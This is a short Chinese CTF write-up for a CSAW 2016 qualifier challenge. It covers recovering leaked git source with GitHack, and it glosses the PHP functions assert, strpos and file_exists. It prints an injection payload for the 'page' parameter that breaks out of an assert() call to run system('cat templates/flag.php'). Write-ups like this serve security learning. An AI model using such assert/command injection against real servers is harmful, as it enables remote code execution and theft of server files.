题目来源csaw-ctf-2016-quals
使用GitHack
assert() 检查一个断言是否为 FALSE
strpos() 函数查找字符串在另一字符串中第一次出现的位置。
file_exists() 函数检查文件或目录是否存在。
playload:
?/page=
about.php‘, ‘123‘) === false and system(‘cat templates/flag.php‘) and strpos(‘templates/flag
查看网页源代码
知识:git漏洞、代码审计
原文:https://www.cnblogs.com/JKding233/p/10864033.html
